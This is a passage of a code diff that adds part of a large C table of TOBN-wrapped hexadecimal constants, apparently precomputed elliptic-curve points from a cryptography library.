+     TOBN(0x80624c41, 0x1150582d), TOBN(0x9ec5c418, 0xfbc555bc),
+     TOBN(0x2c87dcad, 0x771849f1), TOBN(0xb0c932c5, 0x01d7bf6f),
+     TOBN(0x6aa5cd3e, 0x89116eb2), TOBN(0xd378c25a, 0x51ca7bd3),
+     TOBN(0xc612a0da, 0x9e6e3e31), TOBN(0x0417a54d, 0xb68ad5d0),
+     TOBN(0x00451e4a, 0x22c6edb8), TOBN(0x9fbfe019, 0xb42827ce),
+     TOBN(0x2fa92505, 0xba9384a2), TOBN(0x21b8596e, 0x64ad69c1),
+     TOBN(0x8f4fcc49, 0x983b35a6), TOBN(0xde093760, 0x72754672),
+     TOBN(0x2f14ccc8, 0xf7bffe6d), TOBN(0x27566bff, 0x5d94263d),
+     TOBN(0xb5b4e9c6, 0x2df3ec30), TOBN(0x94f1d7d5, 0x3e6ea6ba),
+     TOBN(0x97b7851a, 0xaaca5e9b), TOBN(0x518aa521, 0x56713b97),
+     TOBN(0x3357e8c7, 0x150a61f6), TOBN(0x7842e7e2, 0xec2c2b69),
+     TOBN(0x8dffaf65, 0x6868a548), TOBN(0xd963bd82, 0xe068fc81),
+     TOBN(0x64da5c8b, 0x65917733), TOBN(0x927090ff, 0x7b247328),}
+    ,
+    {TOBN(0x214bc9a7, 0xd298c241), TOBN(0xe3b697ba, 0x56807cfd),
+     TOBN(0xef1c7802, 0x4564eadb), TOBN(0xdde8cdcf, 0xb48149c5),
+     TOBN(0x946bf0a7, 0x5a4d2604), TOBN(0x27154d7f, 0x6c1538af),
+     TOBN(0x95cc9230, 0xde5b1fcc), TOBN(0xd88519e9, 0x66864f82),
+     TOBN(0xb828dd1a, 0x7cb1282c), TOBN(0xa08d7626, 0xbe46973a),
+     TOBN(0x6baf8d40, 0xe708d6b2), TOBN(0x72571fa1, 0x4daeb3f3),
+     TOBN(0x85b1732f, 0xf22dfd98), TOBN(0x87ab01a7, 0x0087108d),
+     TOBN(0xaaaafea8, 0x5988207a), TOBN(0xccc832f8, 0x69f00755),
+     TOBN(0x964d950e, 0x36ff3bf0), TOBN(0x8ad20f6f, 0xf0b34638),
+     TOBN(0x4d9177b3, 0xb5d7585f), TOBN(0xcf839760, 0xef3f019f),
+     TOBN(0x582fc5b3, 0x8288c545), TOBN(0x2f8e4e9b, 0x13116bd1),
+     TOBN(0xf91e1b2f, 0x332120ef), TOBN(0xcf568724, 0x2a17dd23),
+     TOBN(0x488f1185, 0xca8d9d1a), TOBN(0xadf2c77d, 0xd987ded2),
+     TOBN(0x5f3039f0, 0x60c46124), TOBN(0xe5d70b75, 0x71e095f4),
+     TOBN(0x82d58650, 0x6260e70f), TOBN(0x39d75ea7, 0xf750d105),
+     TOBN(0x8cf3d0b1, 0x75bac364), TOBN(0xf3a7564d, 0x21d01329),
+     TOBN(0x182f04cd, 0x2f52d2a7), TOBN(0x4fde149a, 0xe2df565a),
+     TOBN(0xb80c5eec, 0xa79fb2f7), TOBN(0xab491d7b, 0x22ddc897),
+     TOBN(0x99d76c18, 0xc6312c7f), TOBN(0xca0d5f3d, 0x6aa41a57),
+     TOBN(0x71207325, 0xd15363a0), TOBN(0xe82aa265, 0xbeb252c2),
+     TOBN(0x94ab4700, 0xec3128c2), TOBN(0x6c76d862, 0x8e383f49),
+     TOBN(0xdc36b150, 0xc03024eb), TOBN(0xfb439477, 0x53daac69),
+     TOBN(0xfc68764a, 0x8dc79623), TOBN(0x5b86995d, 0xb440fbb2),
+     TOBN(0xd66879bf, 0xccc5ee0d), TOBN(0x05228942, 0x95aa8bd3),
+     TOBN(0xb51a40a5, 0x1e6a75c1), TOBN(0x24327c76, 0x0ea7d817),
+     TOBN(0x06630182, 0x07774597), TOBN(0xd6fdbec3, 0x97fa7164),
+     TOBN(0x20c99dfb, 0x13c90f48), TOBN(0xd6ac5273, 0x686ef263),
+     TOBN(0xc6a50bdc, 0xfef64eeb), TOBN(0xcd87b281, 0x86fdfc32),
+     TOBN(0xb24aa43e, 0x3fcd3efc), TOBN(0xdd26c034, 0xb8088e9a),
+     TOBN(0xa5ef4dc9, 0xbd3d46ea), TOBN(0xa2f99d58, 0x8a4c6a6f),
+     TOBN(0xddabd355, 0x2f1da46c), TOBN(0x72c3f8ce, 0x1afacdd1),
+     TOBN(0xd90c4eee, 0x92d40578), TOBN(0xd28bb41f, 0xca623b94),
+     TOBN(0x50fc0711, 0x745edc11), TOBN(0x9dd9ad7d, 0x3dc87558),
+     TOBN(0xce6931fb, 0xb49d1e64), TOBN(0x6c77a0a2, 0xc98bd0f9),
+     TOBN(0x62b9a629, 0x6baf7cb1), TOBN(0xcf065f91, 0xccf72d22),
+     TOBN(0x7203cce9, 0x79639071), TOBN(0x09ae4885, 0xf9cb732f),
+     TOBN(0x5e7c3bec, 0xee8314f3), TOBN(0x1c068aed, 0xdbea298f),
+     TOBN(0x08d381f1, 0x7c80acec), TOBN(0x03b56be8, 0xe330495b),
+     TOBN(0xaeffb8f2, 0x9222882d), TOBN(0x95ff38f6, 0xc4af8bf7),
+     TOBN(0x50e32d35, 0x1fc57d8c), TOBN(0x6635be52, 0x17b444f0),
+     TOBN(0x04d15276, 0xa5177900), TOBN(0x4e1dbb47, 0xf6858752),
+     TOBN(0x5b475622, 0xc615796c), TOBN(0xa6fa0387, 0x691867bf),
+     TOBN(0xed7f5d56, 0x2844c6d0), TOBN(0xc633cf9b, 0x03a2477d),
+     TOBN(0xf6be5c40, 0x2d3721d6), TOBN(0xaf312eb7, 0xe9fd68e6),
+     TOBN(0x242792d2, 0xe7417ce1), TOBN(0xff42bc71, 0x970ee7f5),
+     TOBN(0x1ff4dc6d, 0x5c67a41e), TOBN(0x77709b7b, 0x20882a58),
+     TOBN(0x3554731d, 0xbe217f2c), TOBN(0x2af2a8cd, 0x5bb72177),
+     TOBN(0x58eee769, 0x591dd059), TOBN(0xbb2930c9, 0x4bba6477),
+     TOBN(0x863ee047, 0x7d930cfc), TOBN(0x4c262ad1, 0x396fd1f4),
+     TOBN(0xf4765bc8, 0x039af7e1), TOBN(0x2519834b, 0x5ba104f6),
+     TOBN(0x7cd61b4c, 0xd105f961), TOBN(0xa5415da5, 0xd63bca54),
+     TOBN(0x778280a0, 0x88a1f17c), TOBN(0xc4968949, 0x2329512c),
+     TOBN(0x174a9126, 0xcecdaa7a), TOBN(0xfc8c7e0e, 0x0b13247b),
+     TOBN(0x29c110d2, 0x3484c1c4), TOBN(0xf8eb8757, 0x831dfc3b),
+     TOBN(0x022f0212, 0xc0067452), TOBN(0x3f6f69ee, 0x7b9b926c),
+     TOBN(0x09032da0, 0xef42daf4), TOBN(0x79f00ade, 0x83f80de4),
+     TOBN(0x6210db71, 0x81236c97), TOBN(0x74f7685b, 0x3ee0781f),
+     TOBN(0x4df7da7b, 0xa3e41372), TOBN(0x2aae38b1, 0xb1a1553e),
+     TOBN(0x1688e222, 0xf6dd9d1b), TOBN(0x57695448, 0x5b8b6487),
+     TOBN(0x478d2127, 0x4b2edeaa), TOBN(0xb2818fa5, 0x1e85956a),
+     TOBN(0x1e6addda, 0xf176f2c0), TOBN(0x01ca4604, 0xe2572658),
+     TOBN(0x0a404ded, 0x85342ffb), TOBN(0x8cf60f96, 0x441838d6),
+     TOBN(0x9bbc691c, 0xc9071c4a), TOBN(0xfd588744, 0x34442803),
+     TOBN(0x97101c85, 0x809c0d81), TOBN(0xa7fb754c, 0x8c456f7f),
+     TOBN(0xc95f3c5c, 0xd51805e1), TOBN(0xab4ccd39, 0xb299dca8),
+     TOBN(0x3e03d20b, 0x47eaf500), TOBN(0xfa3165c1, 0xd7b80893),
+     TOBN(0x005e8b54, 0xe160e552), TOBN(0xdc4972ba, 0x9019d11f),
+     TOBN(0x21a6972e, 0x0c9a4a7a), TOBN(0xa52c258f, 0x37840fd7),
+     TOBN(0xf8559ff4, 0xc1e99d81), TOBN(0x08e1a7d6, 0xa3c617c0),
+     TOBN(0xb398fd43, 0x248c6ba7), TOBN(0x6ffedd91, 0xd1283794),
+     TOBN(0x8a6a59d2, 0xd629d208), TOBN(0xa9d141d5, 0x3490530e),
+     TOBN(0x42f6fc18, 0x38505989), TOBN(0x09bf250d, 0x479d94ee),
+     TOBN(0x223ad3b1, 0xb3822790), TOBN(0x6c5926c0, 0x93b8971c),
+     TOBN(0x609efc7e, 0x75f7fa62), TOBN(0x45d66a6d, 0x1ec2d989),
+     TOBN(0x4422d663, 0x987d2792), TOBN(0x4a73caad, 0x3eb31d2b),
+     TOBN(0xf06c2ac1, 0xa32cb9e6), TOBN(0xd9445c5f, 0x91aeba84),
+     TOBN(0x6af7a1d5, 0xaf71013f), TOBN(0xe68216e5, 0x0bedc946),
+     TOBN(0xf4cba30b, 0xd27370a0), TOBN(0x7981afbf, 0x870421cc),
+     TOBN(0x02496a67, 0x9449f0e1), TOBN(0x86cfc4be, 0x0a47edae),
+     TOBN(0x3073c936, 0xb1feca22), TOBN(0xf5694612, 0x03f8f8fb),
+     TOBN(0xd063b723, 0x901515ea), TOBN(0x4c6c77a5, 0x749cf038),
+     TOBN(0x6361e360, 0xab9e5059), TOBN(0x596cf171, 0xa76a37c0),
+     TOBN(0x800f53fa, 0x6530ae7a), TOBN(0x0f5e631e, 0x0792a7a6),
+     TOBN(0x5cc29c24, 0xefdb81c9), TOBN(0xa269e868, 0x3f9c40ba),
+     TOBN(0xec14f9e1, 0x2cb7191e), TOBN(0x78ea1bd8, 0xe5b08ea6),
+     TOBN(0x3c65aa9b, 0x46332bb9), TOBN(0x84cc22b3, 0xbf80ce25),
+     TOBN(0x0098e9e9, 0xd49d5bf1), TOBN(0xcd4ec1c6, 0x19087da4),
+     TOBN(0x3c9d07c5, 0xaef6e357), TOBN(0x839a0268, 0x9f8f64b8),
+     TOBN(0xc5e9eb62, 0xc6d8607f), TOBN(0x759689f5, 0x6aa995e4),
+     TOBN(0x70464669, 0xbbb48317), TOBN(0x921474bf, 0xe402417d),
+     TOBN(0xcabe135b, 0x2a354c8c), TOBN(0xd51e52d2, 0x812fa4b5),
+     TOBN(0xec741096, 0x53311fe8), TOBN(0x4f774535, 0xb864514b),
+     TOBN(0xbcadd671, 0x5bde48f8), TOBN(0xc9703873, 0x2189bc7d),
+     TOBN(0x5d45299e, 0xc709ee8a), TOBN(0xd1287ee2, 0x845aaff8),
+     TOBN(0x7d1f8874, 0xdb1dbf1f), TOBN(0xea46588b, 0x990c88d6),
+     TOBN(0x60ba649a, 0x84368313), TOBN(0xd5fdcbce, 0x60d543ae),
+     TOBN(0x90b46d43, 0x810d5ab0), TOBN(0x6739d8f9, 0x04d7e5cc),
+     TOBN(0x021c1a58, 0x0d337c33), TOBN(0x00a61162, 0x68e67c40),
+     TOBN(0x95ef413b, 0x379f0a1f), TOBN(0xfe126605, 0xe9e2ab95),
+     TOBN(0x67578b85, 0x2f5f199c), TOBN(0xf5c00329, 0x2cb84913),
+     TOBN(0xf7956430, 0x37577dd8), TOBN(0x83b82af4, 0x29c5fe88),
+     TOBN(0x9c1bea26, 0xcdbdc132), TOBN(0x589fa086, 0x9c04339e),
+     TOBN(0x033e9538, 0xb13799df), TOBN(0x85fa8b21, 0xd295d034),
+     TOBN(0xdf17f73f, 0xbd9ddcca), TOBN(0xf32bd122, 0xddb66334),
+     TOBN(0x55ef88a7, 0x858b044c), TOBN(0x1f0d69c2, 0x5aa9e397),
+     TOBN(0x55fd9cc3, 0x40d85559), TOBN(0xc774df72, 0x7785ddb2),
+     TOBN(0x5dcce9f6, 0xd3bd2e1c), TOBN(0xeb30da20, 0xa85dfed0),
+     TOBN(0x5ed7f5bb, 0xd3ed09c4), TOBN(0x7d42a35c, 0x82a9c1bd),
+     TOBN(0xcf3de995, 0x9890272d), TOBN(0x75f3432a, 0x3e713a10),
+     TOBN(0x5e13479f, 0xe28227b8), TOBN(0xb8561ea9, 0xfefacdc8),
+     TOBN(0xa6a297a0, 0x8332aafd), TOBN(0x9b0d8bb5, 0x73809b62),
+     TOBN(0xd2fa1cfd, 0x0c63036f), TOBN(0x7a16eb55, 0xbd64bda8),
+     TOBN(0x3f5cf5f6, 0x78e62ddc), TOBN(0x2267c454, 0x07fd752b),
+     TOBN(0x5e361b6b, 0x5e437bbe), TOBN(0x95c59501, 0x8354e075),
+     TOBN(0xec725f85, 0xf2b254d9), TOBN(0x844b617d, 0x2cb52b4e),
+     TOBN(0xed8554f5, 0xcf425fb5), TOBN(0xab67703e, 0x2af9f312),
+     TOBN(0x4cc34ec1, 0x3cf48283), TOBN(0xb09daa25, 0x9c8a705e),
+     TOBN(0xd1e9d0d0, 0x5b7d4f84), TOBN(0x4df6ef64, 0xdb38929d),
+     TOBN(0xe16b0763, 0xaa21ba46), TOBN(0xc6b1d178, 0xa293f8fb),
+     TOBN(0x0ff5b602, 0xd520aabf), TOBN(0x94d671bd, 0xc339397a),
+     TOBN(0x7c7d98cf, 0x4f5792fa), TOBN(0x7c5e0d67, 0x11215261),
+     TOBN(0x9b19a631, 0xa7c5a6d4), TOBN(0xc8511a62, 0x7a45274d),
+     TOBN(0x0c16621c, 0xa5a60d99), TOBN(0xf7fbab88, 0xcf5e48cb),
+     TOBN(0xab1e6ca2, 0xf7ddee08), TOBN(0x83bd08ce, 0xe7867f3c),
+     TOBN(0xf7e48e8a, 0x2ac13e27), TOBN(0x4494f6df, 0x4eb1a9f5),
+     TOBN(0xedbf84eb, 0x981f0a62), TOBN(0x49badc32, 0x536438f0),
+     TOBN(0x50bea541, 0x004f7571), TOBN(0xbac67d10, 0xdf1c94ee),
+     TOBN(0x253d73a1, 0xb727bc31), TOBN(0xb3d01cf2, 0x30686e28),
+     TOBN(0x51b77b1b, 0x55fd0b8b), TOBN(0xa099d183, 0xfeec3173),
+     TOBN(0x202b1fb7, 0x670e72b7), TOBN(0xadc88b33, 0xa8e1635f),
+     TOBN(0x34e8216a, 0xf989d905), TOBN(0xc2e68d20, 0x29b58d01),
+     TOBN(0x11f81c92, 0x6fe55a93), TOBN(0x15f1462a, 0x8f296f40),
+     TOBN(0x1915d375, 0xea3d62f2), TOBN(0xa17765a3, 0x01c8977d),
+     TOBN(0x7559710a, 0xe47b26f6), TOBN(0xe0bd29c8, 0x535077a5),
+     TOBN(0x615f976d, 0x08d84858), TOBN(0x370dfe85, 0x69ced5c1),
+     TOBN(0xbbc7503c, 0xa734fa56), TOBN(0xfbb9f1ec, 0x91ac4574),
+     TOBN(0x95d7ec53, 0x060dd7ef), TOBN(0xeef2dacd, 0x6e657979),
+     TOBN(0x54511af3, 0xe2a08235), TOBN(0x1e324aa4, 0x1f4aea3d),
+     TOBN(0x550e7e71, 0xe6e67671), TOBN(0xbccd5190, 0xbf52faf7),
+     TOBN(0xf880d316, 0x223cc62a), TOBN(0x0d402c7e, 0x2b32eb5d),
+     TOBN(0xa40bc039, 0x306a5a3b), TOBN(0x4e0a41fd, 0x96783a1b),
+     TOBN(0xa1e8d39a, 0x0253cdd4), TOBN(0x6480be26, 0xc7388638),
+     TOBN(0xee365e1d, 0x2285f382), TOBN(0x188d8d8f, 0xec0b5c36),
+     TOBN(0x34ef1a48, 0x1f0f4d82), TOBN(0x1a8f43e1, 0xa487d29a),
+     TOBN(0x8168226d, 0x77aefb3a), TOBN(0xf69a751e, 0x1e72c253),
+     TOBN(0x8e04359a, 0xe9594df1), TOBN(0x475ffd7d, 0xd14c0467),
+     TOBN(0xb5a2c2b1, 0x3844e95c), TOBN(0x85caf647, 0xdd12ef94),
+     TOBN(0x1ecd2a9f, 0xf1063d00), TOBN(0x1dd2e229, 0x23843311),
+     TOBN(0x38f0e09d, 0x73d17244), TOBN(0x3ede7746, 0x8fc653f1),
+     TOBN(0xae4459f5, 0xdc20e21c), TOBN(0x00db2ffa, 0x6a8599ea),
+     TOBN(0x11682c39, 0x30cfd905), TOBN(0x4934d074, 0xa5c112a6),
+     TOBN(0xbdf063c5, 0x568bfe95), TOBN(0x779a440a, 0x016c441a),
+     TOBN(0x0c23f218, 0x97d6fbdc), TOBN(0xd3a5cd87, 0xe0776aac),
+     TOBN(0xcee37f72, 0xd712e8db), TOBN(0xfb28c70d, 0x26f74e8d),
+     TOBN(0xffe0c728, 0xb61301a0), TOBN(0xa6282168, 0xd3724354),
+     TOBN(0x7ff4cb00, 0x768ffedc), TOBN(0xc51b3088, 0x03b02de9),
+     TOBN(0xa5a8147c, 0x3902dda5), TOBN(0x35d2f706, 0xfe6973b4),
+     TOBN(0x5ac2efcf, 0xc257457e), TOBN(0x933f48d4, 0x8700611b),
+     TOBN(0xc365af88, 0x4912beb2), TOBN(0x7f5a4de6, 0x162edf94),
+     TOBN(0xc646ba7c, 0x0c32f34b), TOBN(0x632c6af3, 0xb2091074),
+     TOBN(0x58d4f2e3, 0x753e43a9), TOBN(0x70e1d217, 0x24d4e23f),
+     TOBN(0xb24bf729, 0xafede6a6), TOBN(0x7f4a94d8, 0x710c8b60),
+     TOBN(0xaad90a96, 0x8d4faa6a), TOBN(0xd9ed0b32, 0xb066b690),
+     TOBN(0x52fcd37b, 0x78b6dbfd), TOBN(0x0b64615e, 0x8bd2b431),
+     TOBN(0x228e2048, 0xcfb9fad5), TOBN(0xbeaa386d, 0x240b76bd),
+     TOBN(0x2d6681c8, 0x90dad7bc), TOBN(0x3e553fc3, 0x06d38f5e),
+     TOBN(0xf27cdb9b, 0x9d5f9750), TOBN(0x3e85c52a, 0xd28c5b0e),
+     TOBN(0x190795af, 0x5247c39b), TOBN(0x547831eb, 0xbddd6828),
+     TOBN(0xf327a227, 0x4a82f424), TOBN(0x36919c78, 0x7e47f89d),
+     TOBN(0xe4783919, 0x43c7392c), TOBN(0xf101b9aa, 0x2316fefe),
+     TOBN(0xbcdc9e9c, 0x1c5009d2), TOBN(0xfb55ea13, 0x9cd18345),
+     TOBN(0xf5b5e231, 0xa3ce77c7), TOBN(0xde6b4527, 0xd2f2cb3d),
+     TOBN(0x10f6a333, 0x9bb26f5f), TOBN(0x1e85db8e, 0x044d85b6),
+     TOBN(0xc3697a08, 0x94197e54), TOBN(0x65e18cc0, 0xa7cb4ea8),
+     TOBN(0xa38c4f50, 0xa471fe6e), TOBN(0xf031747a, 0x2f13439c),
+     TOBN(0x53c4a6ba, 0xc007318b), TOBN(0xa8da3ee5, 0x1deccb3d),
+     TOBN(0x0555b31c, 0x558216b1), TOBN(0x90c7810c, 0x2f79e6c2),
+     TOBN(0x9b669f4d, 0xfe8eed3c), TOBN(0x70398ec8, 0xe0fac126),
+     TOBN(0xa96a449e, 0xf701b235), TOBN(0x0ceecdb3, 0xeb94f395),
+     TOBN(0x285fc368, 0xd0cb7431), TOBN(0x0d37bb52, 0x16a18c64),
+     TOBN(0x05110d38, 0xb880d2dd), TOBN(0xa60f177b, 0x65930d57),
+     TOBN(0x7da34a67, 0xf36235f5), TOBN(0x47f5e17c, 0x183816b9),
+     TOBN(0xc7664b57, 0xdb394af4), TOBN(0x39ba215d, 0x7036f789),
+     TOBN(0x46d2ca0e, 0x2f27b472), TOBN(0xc42647ee, 0xf73a84b7),
+     TOBN(0x44bc7545, 0x64488f1d), TOBN(0xaa922708, 0xf4cf85d5),
+     TOBN(0x721a01d5, 0x53e4df63), TOBN(0x649c0c51, 0x5db46ced),
+     TOBN(0x6bf0d64e, 0x3cffcb6c), TOBN(0xe3bf93fe, 0x50f71d96),
+     TOBN(0x75044558, 0xbcc194a0), TOBN(0x16ae3372, 0x6afdc554),
+     TOBN(0xbfc01adf, 0x5ca48f3f), TOBN(0x64352f06, 0xe22a9b84),
+     TOBN(0xcee54da1, 0xc1099e4a), TOBN(0xbbda54e8, 0xfa1b89c0),
+     TOBN(0x166a3df5, 0x6f6e55fb), TOBN(0x1ca44a24, 0x20176f88),
+     TOBN(0x936afd88, 0xdfb7b5ff), TOBN(0xe34c2437, 0x8611d4a0),
+     TOBN(0x7effbb75, 0x86142103), TOBN(0x6704ba1b, 0x1f34fc4d),
+     TOBN(0x7c2a468f, 0x10c1b122), TOBN(0x36b3a610, 0x8c6aace9),
+     TOBN(0xabfcc0a7, 0x75a0d050), TOBN(0x066f9197, 0x3ce33e32),
+     TOBN(0xce905ef4, 0x29fe09be), TOBN(0x89ee25ba, 0xa8376351),
+     TOBN(0x2a3ede22, 0xfd29dc76), TOBN(0x7fd32ed9, 0x36f17260),
+     TOBN(0x0cadcf68, 0x284b4126), TOBN(0x63422f08, 0xa7951fc8),
+     TOBN(0x562b24f4, 0x0807e199), TOBN(0xfe9ce5d1, 0x22ad4490),
+     TOBN(0xc2f51b10, 0x0db2b1b4), TOBN(0xeb3613ff, 0xe4541d0d),
+     TOBN(0xbd2c4a05, 0x2680813b), TOBN(0x527aa55d, 0x561b08d6),
+     TOBN(0xa9f8a40e, 0xa7205558), TOBN(0xe3eea56f, 0x243d0bec),
+     TOBN(0x7b853817, 0xa0ff58b3), TOBN(0xb67d3f65, 0x1a69e627),
+     TOBN(0x0b76bbb9, 0xa869b5d6), TOBN(0xa3afeb82, 0x546723ed),
+     TOBN(0x5f24416d, 0x3e554892), TOBN(0x8413b53d, 0x430e2a45),
+     TOBN(0x99c56aee, 0x9032a2a0), TOBN(0x09432bf6, 0xeec367b1),
+     TOBN(0x552850c6, 0xdaf0ecc1), TOBN(0x49ebce55, 0x5bc92048),
+     TOBN(0xdfb66ba6, 0x54811307), TOBN(0x1b84f797, 0x6f298597),
+     TOBN(0x79590481, 0x8d1d7a0d), TOBN(0xd9fabe03, 0x3a6fa556),
+     TOBN(0xa40f9c59, 0xba9e5d35), TOBN(0xcb1771c1, 0xf6247577),
+     TOBN(0x542a47ca, 0xe9a6312b), TOBN(0xa34b3560, 0x552dd8c5),
+     TOBN(0xfdf94de0, 0x0d794716), TOBN(0xd46124a9, 0x9c623094),
+     TOBN(0x56b7435d, 0x68afe8b4), TOBN(0x27f20540, 0x6c0d8ea1),
+     TOBN(0x12b77e14, 0x73186898), TOBN(0xdbc3dd46, 0x7479490f),
+     TOBN(0x951a9842, 0xc03b0c05), TOBN(0x8b1b3bb3, 0x7921bc96),
+     TOBN(0xa573b346, 0x2b202e0a), TOBN(0x77e4665d, 0x47254d56),
+     TOBN(0x08b70dfc, 0xd23e3984), TOBN(0xab86e8bc, 0xebd14236),
+     TOBN(0xaa3e07f8, 0x57114ba7), TOBN(0x5ac71689, 0xab0ef4f2),
+     TOBN(0x88fca384, 0x0139d9af), TOBN(0x72733f88, 0x76644af0),
+     TOBN(0xf122f72a, 0x65d74f4a), TOBN(0x13931577, 0xa5626c7a),
+     TOBN(0xd5b5d9eb, 0x70f8d5a4), TOBN(0x375adde7, 0xd7bbb228),
+     TOBN(0x31e88b86, 0x0c1c0b32), TOBN(0xd1f568c4, 0x173edbaa),
+     TOBN(0x1592fc83, 0x5459df02), TOBN(0x2beac0fb, 0x0fcd9a7e),
+     TOBN(0xb0a6fdb8, 0x1b473b0a), TOBN(0xe3224c6f, 0x0fe8fc48),
+     TOBN(0x680bd00e, 0xe87edf5b), TOBN(0x30385f02, 0x20e77cf5),
+     TOBN(0xe9ab98c0, 0x4d42d1b2), TOBN(0x72d191d2, 0xd3816d77),
+     TOBN(0x1564daca, 0x0917d9e5), TOBN(0x394eab59, 0x1f8fed7f),
+     TOBN(0xa209aa8d, 0x7fbb3896), TOBN(0x5564f3b9, 0xbe6ac98e),
+     TOBN(0xead21d05, 0xd73654ef), TOBN(0x68d1a9c4, 0x13d78d74),
+     TOBN(0x61e01708, 0x6d4973a0), TOBN(0x83da3500, 0x46e6d32a),
+     TOBN(0x6a3dfca4, 0x68ae0118), TOBN(0xa1b9a4c9, 0xd02da069),
+     TOBN(0x0b2ff9c7, 0xebab8302), TOBN(0x98af07c3, 0x944ba436),
+     TOBN(0x85997326, 0x995f0f9f), TOBN(0x467fade0, 0x71b58bc6),
+     TOBN(0x47e4495a, 0xbd625a2b), TOBN(0xfdd2d01d, 0x33c3b8cd),
+     TOBN(0x2c38ae28, 0xc693f9fa), TOBN(0x48622329, 0x348f7999),
+     TOBN(0x97bf738e, 0x2161f583), TOBN(0x15ee2fa7, 0x565e8cc9),
+     TOBN(0xa1a5c845, 0x5777e189), TOBN(0xcc10bee0, 0x456f2829),
+     TOBN(0x8ad95c56, 0xda762bd5), TOBN(0x152e2214, 0xe9d91da8),
+     TOBN(0x975b0e72, 0x7cb23c74), TOBN(0xfd5d7670, 0xa90c66df),
+     TOBN(0xb5b5b8ad, 0x225ffc53), TOBN(0xab6dff73, 0xfaded2ae),
+     TOBN(0xebd56781, 0x6f4cbe9d), TOBN(0x0ed8b249, 0x6a574bd7),
+     TOBN(0x41c246fe, 0x81a881fa), TOBN(0x91564805, 0xc3db9c70),
+     TOBN(0xd7c12b08, 0x5b862809), TOBN(0x1facd1f1, 0x55858d7b),
+     TOBN(0x7693747c, 0xaf09e92a), TOBN(0x3b69dcba, 0x189a425f),
+     TOBN(0x0be28e9f, 0x967365ef), TOBN(0x57300eb2, 0xe801f5c9),
+     TOBN(0x93b8ac6a, 0xd583352f), TOBN(0xa2cf1f89, 0xcd05b2b7),
+     TOBN(0x7c0c9b74, 0x4dcc40cc), TOBN(0xfee38c45, 0xada523fb),
+     TOBN(0xb49a4dec, 0x1099cc4d), TOBN(0x325c377f, 0x69f069c6),
+     TOBN(0xe12458ce, 0x476cc9ff), TOBN(0x580e0b6c, 0xc6d4cb63),
+     TOBN(0xd561c8b7, 0x9072289b), TOBN(0x0377f264, 0xa619e6da),
+     TOBN(0x26685362, 0x88e591a5), TOBN(0xa453a7bd, 0x7523ca2b),
+     TOBN(0x8a9536d2, 0xc1df4533), TOBN(0xc8e50f2f, 0xbe972f79),
+     TOBN(0xd433e50f, 0x6d3549cf), TOBN(0x6f33696f, 0xfacd665e),
+     TOBN(0x695bfdac, 0xce11fcb4), TOBN(0x810ee252, 0xaf7c9860),
+     TOBN(0x65450fe1, 0x7159bb2c), TOBN(0xf7dfbebe, 0x758b357b),
+     TOBN(0x2b057e74, 0xd69fea72), TOBN(0xd485717a, 0x92731745),}
+    ,
+    {TOBN(0x896c42e8, 0xee36860c), TOBN(0xdaf04dfd, 0x4113c22d),
+     TOBN(0x1adbb7b7, 0x44104213), TOBN(0xe5fd5fa1, 0x1fd394ea),
+     TOBN(0x68235d94, 0x1a4e0551), TOBN(0x6772cfbe, 0x18d10151),
+     TOBN(0x276071e3, 0x09984523), TOBN(0xe4e879de, 0x5a56ba98),
+     TOBN(0xaaafafb0, 0x285b9491), TOBN(0x01a0be88, 0x1e4c705e),
+     TOBN(0xff1d4f5d, 0x2ad9caab), TOBN(0x6e349a4a, 0xc37a233f),
+     TOBN(0xcf1c1246, 0x4a1c6a16), TOBN(0xd99e6b66, 0x29383260),
+     TOBN(0xea3d4366, 0x5f6d5471), TOBN(0x36974d04, 0xff8cc89b),
+     TOBN(0xc26c49a1, 0xcfe89d80), TOBN(0xb42c026d, 0xda9c8371),
+     TOBN(0xca6c013a, 0xdad066d2), TOBN(0xfb8f7228, 0x56a4f3ee),
+     TOBN(0x08b579ec, 0xd850935b), TOBN(0x34c1a74c, 0xd631e1b3),
+     TOBN(0xcb5fe596, 0xac198534), TOBN(0x39ff21f6, 0xe1f24f25),
+     TOBN(0x27f29e14, 0x8f929057), TOBN(0x7a64ae06, 0xc0c853df),
+     TOBN(0x256cd183, 0x58e9c5ce), TOBN(0x9d9cce82, 0xded092a5),
+     TOBN(0xcc6e5979, 0x6e93b7c7), TOBN(0xe1e47092, 0x31bb9e27),
+     TOBN(0xb70b3083, 0xaa9e29a0), TOBN(0xbf181a75, 0x3785e644),
+     TOBN(0xf53f2c65, 0x8ead09f7), TOBN(0x1335e1d5, 0x9780d14d),
+     TOBN(0x69cc20e0, 0xcd1b66bc), TOBN(0x9b670a37, 0xbbe0bfc8),
+     TOBN(0xce53dc81, 0x28efbeed), TOBN(0x0c74e77c, 0x8326a6e5),
+     TOBN(0x3604e0d2, 0xb88e9a63), TOBN(0xbab38fca, 0x13dc2248),
+     TOBN(0x8ed6e8c8, 0x5c0a3f1e), TOBN(0xbcad2492, 0x7c87c37f),
+     TOBN(0xfdfb62bb, 0x9ee3b78d), TOBN(0xeba8e477, 0xcbceba46),
+     TOBN(0x37d38cb0, 0xeeaede4b), TOBN(0x0bc498e8, 0x7976deb6),
+     TOBN(0xb2944c04, 0x6b6147fb), TOBN(0x8b123f35, 0xf71f9609),
+     TOBN(0xa155dcc7, 0xde79dc24), TOBN(0xf1168a32, 0x558f69cd),
+     TOBN(0xbac21595, 0x0d1850df), TOBN(0x15c8295b, 0xb204c848),
+     TOBN(0xf661aa36, 0x7d8184ff), TOBN(0xc396228e, 0x30447bdb),
+     TOBN(0x11cd5143, 0xbde4a59e), TOBN(0xe3a26e3b, 0x6beab5e6),
+     TOBN(0xd3b3a13f, 0x1402b9d0), TOBN(0x573441c3, 0x2c7bc863),
+     TOBN(0x4b301ec4, 0x578c3e6e), TOBN(0xc26fc9c4, 0x0adaf57e),
+     TOBN(0x96e71bfd, 0x7493cea3), TOBN(0xd05d4b3f, 0x1af81456),
+     TOBN(0xdaca2a8a, 0x6a8c608f), TOBN(0x53ef07f6, 0x0725b276),
+     TOBN(0x07a5fbd2, 0x7824fc56), TOBN(0x34675218, 0x13289077),
+     TOBN(0x5bf69fd5, 0xe0c48349), TOBN(0xa613ddd3, 0xb6aa7875),
+     TOBN(0x7f78c19c, 0x5450d866), TOBN(0x46f4409c, 0x8f84a481),
+     TOBN(0x9f1d1928, 0x90fce239), TOBN(0x016c4168, 0xb2ce44b9),
+     TOBN(0xbae023f0, 0xc7435978), TOBN(0xb152c888, 0x20e30e19),
+     TOBN(0x9c241645, 0xe3fa6faf), TOBN(0x735d95c1, 0x84823e60),
